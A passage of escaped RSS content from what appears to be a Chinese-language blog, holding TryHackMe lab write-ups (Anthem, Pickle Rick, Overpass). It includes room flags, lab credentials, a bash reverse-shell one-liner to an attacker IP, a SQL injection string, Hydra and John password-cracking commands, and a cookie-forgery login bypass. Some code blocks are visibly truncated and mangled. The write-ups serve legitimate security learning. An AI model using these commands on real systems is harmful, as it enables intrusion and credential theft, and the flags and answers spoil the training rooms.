&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; # Define the directories not to crawl
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Disallow: /bin/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Disallow: /config/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Disallow: /umbraco/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Disallow: /umbraco_client/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="回答問題"&gt;回答問題&lt;/h2&gt;
&lt;h3 id="普通問題"&gt;普通問題&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;What port is for the web server?&lt;code&gt;80&lt;/code&gt;What port is for remote desktop service?- &lt;code&gt;3389&lt;/code&gt;What is a possible password in one of the pages web crawlers check for?- 他都說 crawlers 了，所以應該就是 &lt;code&gt;robots.txt&lt;/code&gt; 的密碼&lt;/li&gt;
&lt;li&gt;&lt;code&gt;UmbracoIsTheBest!&lt;/code&gt;What CMS is the website using?- &lt;code&gt;umbraco&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;robots.txt 上有寫What is the domain of the website?- &lt;code&gt;anthem.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;首頁上就有&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="通靈問題"&gt;通靈問題&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;What&amp;rsquo;s the name of the AdministratorCMS 中有一篇文章這樣寫&lt;/li&gt;
&lt;li&gt;http://10.10.18.8/archive/a-cheers-to-our-it-department/- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f1b1d-Q0YQ938.png"&gt; &lt;code&gt;Born on a Monday, Christened on Tuesday, Married on Wednesday, Took ill on Thursday, Grew worse on Friday, Died on Saturday, Buried on Sunday. That was the end…&lt;/code&gt;- 把字串丟去 Google 可以找到這篇文https://en.wikipedia.org/wiki/Solomon_Grundy_(nursery_rhyme)&lt;/li&gt;
&lt;li&gt;所以 admin 叫做 &lt;code&gt;Solomon_Grundy&lt;/code&gt;Can we find find the email address of the administrator?- 在某篇貼文中http://10.10.18.8/archive/we-are-hiring/&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/55edc-bijPypa.png"&gt;貼文者叫做 &lt;code&gt;Jane Doe&lt;/code&gt;Email 是 : &lt;code&gt;JD@anthem.com&lt;/code&gt;- 看起來規則是姓名各取一個字，都大寫 &lt;code&gt;@anthem.com&lt;/code&gt;那 admin 這個- Solomon_Grundy 就 SG ㄅ&lt;code&gt;SG@anthem.com&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="flag-們"&gt;Flag 們&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;我覺得這邊的 Flag 也都偏通靈沒有任何 web 技巧可言&lt;/li&gt;
&lt;li&gt;就把整個網站繞一圈就能逛完Flag1- http://10.10.18.8/archive/we-are-hiring/&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5a8ab-CzYJ4C4.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{L0L_WH0_US3S_M3T4}&lt;/code&gt;Flag2- http://10.10.18.8/&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/52270-IOPlHbO.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{G!T_G00D}&lt;/code&gt;Flag4- http://10.10.18.8/archive/a-cheers-to-our-it-department/&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/39f29-ONgiSFD.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{AN0TH3R_M3TA}&lt;/code&gt;Flag3- http://10.10.18.8/authors/jane-doe/&lt;/li&gt;
&lt;li&gt;THM{L0L_WH0_D15}&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ddf0a-eaHzgde.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="通靈登入"&gt;通靈登入&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;通靈登入使用帳號 : &lt;a href="mailto:SG@anthem.com"&gt;SG@anthem.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;密碼 : UmbracoIsTheBest!前面 robots.txt 找到ㄉ登入 http://10.10.18.8/umbraco&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/da18a-MOvk1MR.png"&gt;通靈RDP- &lt;code&gt;sudo apt install freerdp2-x11&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;帳號 : &lt;code&gt;SG&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;UmbracoIsTheBest!&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;xfreerdp +drives /u:SG /v:10.10.18.8:3389&lt;/code&gt;桌面上就有 user.txt- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cbb5c-bslatpD.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{N00T_NO0T}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;開啟顯示隱藏檔案&lt;/li&gt;
&lt;li&gt;逛到 &lt;code&gt;c:\backup\restore&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/df4f0-depc0nK.png"&gt;他沒有讀取權限，但我們可以修改他的權限- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/454e6-2gQDd6c.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/39c00-36JBMgC.png"&gt;修改後點開可以看到以下字串- &lt;code&gt;ChangeMeBaby1MoreTime&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;猜測他可能是 admin 密碼使用RDP連 Admin- &lt;code&gt;xfreerdp +drives /u:Administrator /v:10.10.18.8:3389&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;使用密碼 &lt;code&gt;ChangeMeBaby1MoreTime&lt;/code&gt;取得 admin 權限- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ace1e-zlObe8V.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{Y0U_4R3_1337}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Pickle Rick (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/29/pickle-rick-try-hack-me-writeup/</link><pubDate>Thu, 29 Jul 2021 13:11:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/29/pickle-rick-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/picklerick"&gt;https://tryhackme.com/room/picklerick&lt;/a&gt;&lt;br&gt;
IP: 10.10.223.99&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nmap -A 10.10.223.99&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/54183-9Qp6IZr.png"&gt;&lt;/li&gt;
&lt;li&gt;22 port&lt;/li&gt;
&lt;li&gt;80 port首頁原始碼- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4f0a6-3GxwBdt.png"&gt;&lt;/li&gt;
&lt;li&gt;提示 username : &lt;code&gt;R1ckRul3s&lt;/code&gt;robots.txt- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/90e3f-rk9iz1l.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Wubbalubbadubdub&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="login"&gt;Login&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6a91d-700dfoQ.png"&gt;使用 Username : &lt;code&gt;R1ckRul3s&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Password : &lt;code&gt;Wubbalubbadubdub&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="webshell"&gt;Webshell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;進入後就是一個 webshell戳成 reverse shell&lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;Flag1- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9afab-9jULhML.png"&gt;&lt;/li&gt;
&lt;li&gt;在 web 目錄&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mr. meeseek hair&lt;/code&gt;Flag2- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/21405-5cgM6zS.png"&gt;&lt;/li&gt;
&lt;li&gt;在 rick 家目錄&lt;/li&gt;
&lt;li&gt;&lt;code&gt;1 jerry tear&lt;/code&gt;Flag3- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e584d-kKcUno1.png"&gt;&lt;/li&gt;
&lt;li&gt;發現可以直接 &lt;code&gt;sudo su&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以就進 root 取得最後一個 flag&lt;/li&gt;
&lt;li&gt;&lt;code&gt;fleeb juice&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Overpass (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/27/overpass-try-hack-me-writeup/</link><pubDate>Tue, 27 Jul 2021 13:07:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/27/overpass-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/overpass"&gt;https://tryhackme.com/room/overpass&lt;/a&gt;&lt;br&gt;
IP : 10.10.214.180&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;首先是老梗的用 Nmap 掃一下&lt;code&gt;nmap -A 10.10.214.180&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e65ca-ZlQoGXj.png"&gt;&lt;/li&gt;
&lt;li&gt;發現基本上只有開 ssh 跟 http接下來用 dirsearch 掃一下路徑- &lt;code&gt;python3 dirsearch.py -u http://10.10.214.180/ -e all&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看起來基本上比較有趣的只有 &lt;code&gt;/admin/&lt;/code&gt;admin 介面- 基本上就是一個滿普通的登入介面，可以輸入帳號或密碼對著登入介面做了一些盲測的 SQLi&lt;code&gt;'or'1'='1 --&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;之類的都沒有反應&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="rot47-多走的彎路qq"&gt;ROT47 (多走的彎路QQ)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6d3ad-CgeDRFe.png"&gt;- 選到 About 看了一下，簡介是說他們曾經因為密碼在 rockyou 裡面，所以感到很失望，創了一個密碼管理軟體到 Downloads 來看一下他們的密碼軟體- 他們有 source code&lt;/li&gt;
&lt;li&gt;http://10.10.129.94/downloads/src/overpass.go&lt;/li&gt;
&lt;li&gt;擷取重點發現- 是一個用 Go 語言寫的密碼管理軟體，而他們的加密使用了 ROT47 的加密算法&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;//Secure encryption algorithm from https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8be9fd;font-style:italic"&gt;func&lt;/span&gt; &lt;span style="color:#50fa7b"&gt;rot47&lt;/span&gt;(input &lt;span style="color:#8be9fd"&gt;string&lt;/span&gt;) &lt;span style="color:#8be9fd"&gt;string&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;var&lt;/span&gt; result []&lt;span style="color:#8be9fd"&gt;string&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i &lt;span style="color:#ff79c6"&gt;:=&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;range&lt;/span&gt; input[:&lt;span style="color:#8be9fd;font-style:italic"&gt;len&lt;/span&gt;(input)] {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; j &lt;span style="color:#ff79c6"&gt;:=&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;int&lt;/span&gt;(input[i])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; (j &lt;span style="color:#ff79c6"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;33&lt;/span&gt;) &lt;span style="color:#ff79c6"&gt;&amp;amp;&amp;amp;&lt;/span&gt; (j
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;```python
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;def rot47(s):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt; x = []
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt; for i in range(len(s)):
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt; j = ord(s[i])
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt; if j &amp;gt;= 33 and j 我心裡的猜想- 它們之前的密碼是用 rockyou 的密碼，現在在推他們自己的密碼管理軟體，使用 ROT47
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;- 該不會……可以爆破 web 介面密碼，使用 ROT47 後的 rockyou 吧?
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;- 所以寫了以下的 Code 來把 rockyou 轉 ROT47
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;```&lt;/span&gt;python
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;def &lt;span style="color:#50fa7b"&gt;rot47&lt;/span&gt;(s):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x = []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;for&lt;/span&gt; i in &lt;span style="color:#ff79c6"&gt;range&lt;/span&gt;(&lt;span style="color:#8be9fd;font-style:italic"&gt;len&lt;/span&gt;(s)):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; j = &lt;span style="color:#50fa7b"&gt;ord&lt;/span&gt;(s[i])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; j &lt;span style="color:#ff79c6"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;33&lt;/span&gt; and j 所以就把所有的使用者準備成一個 &lt;span style="color:#50fa7b"&gt;txt&lt;/span&gt; (每個人名換一行)使用 Hydra 進行爆破&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;`hydra -L user_l.txt -P rot47rock.txt 10.10.214.180 http-post-form &amp;#34;/api/login:username=^USER^&amp;amp;password=^PASS^:Incorrect credentials&amp;#34;`&lt;/span&gt;跑ㄌ很久也沒用沒用QQ
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;## 觀察登入程式碼
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; 爆破畢竟是下下策，還是先觀察一下登入介面的原始碼有什麼東東
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; 就發現了一個 login.jshttp:&lt;span style="color:#ff79c6"&gt;//10.10.214.180/login.js&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; 擷取重要的弱點&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; 跑到 elase 代表登入成功，會寫入一個餅乾餅乾名稱 : &lt;span style="color:#f1fa8c"&gt;&amp;#34;SessionToken&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;-&lt;/span&gt; 餅乾值 : statusOrCookie
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f1fa8c"&gt;``&lt;/span&gt;`javascript
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;if&lt;/span&gt; (statusOrCookie &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt;= &lt;span style="color:#f1fa8c"&gt;&amp;#34;Incorrect credentials&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; loginStatus.textContent = &lt;span style="color:#f1fa8c"&gt;&amp;#34;Incorrect Credentials&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; passwordBox.value=&lt;span style="color:#f1fa8c"&gt;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff79c6"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Cookies.&lt;span style="color:#50fa7b"&gt;set&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;SessionToken&amp;#34;&lt;/span&gt;,statusOrCookie)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; window.location = &lt;span style="color:#f1fa8c"&gt;&amp;#34;/admin&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;直接用 Firefox 新增一個餅乾名稱用 &amp;ldquo;SessionToken&amp;rdquo;， Value 亂寫&lt;/li&gt;
&lt;li&gt;然後就登進去了!!!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cbbb4-BhLN5NG.png"&gt;上面直接留了一串 Private Key，也寫說是給 james 的&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;-----BEGIN RSA PRIVATE KEY-----
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Proc-Type: 4,ENCRYPTED
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;-----END RSA PRIVATE KEY-----
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;那我們當然就把這一串存到自己的電腦，再嘗試 run 看看囉!!&lt;code&gt;chmod 600 James_key.pem&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ssh james@10.10.214.180 -i James_key.pem&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9ac24-8lp75sM.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 key 需要用密碼!爆密碼- 老梗，請約翰出場，先找 &lt;code&gt;ssh2john&lt;/code&gt; 把 key 轉 &lt;code&gt;john&lt;/code&gt; 的格式&lt;code&gt;python3 ../ssh2john.py James_key.pem &amp;gt; James_john.txt&lt;/code&gt;再來就 run john 囉!&lt;code&gt;john James_john.txt --wordlist=/opt/rockyou.txt&lt;/code&gt;- 密碼就出來囉!!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7d7bc-ohLWuxD.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;james13&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;(其實我先跑了 rot47 的密碼，但失敗了QQ)使用 ssh 進行登入- &lt;code&gt;ssh james@10.10.214.180 -i James_key.pem&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;搭配密碼 &lt;code&gt;james13&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;成功登入!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e9375-LciR33S.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 &lt;code&gt;user.txt``thm{65c1aaf000506e56996822c6281e6bf7}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;之前我們都用 &lt;code&gt;Linenum&lt;/code&gt;，這次來換換口味，使用小豌豆 &lt;code&gt;Linpeas&lt;/code&gt; 吧!先把檔案 scp 上去&lt;/li&gt;
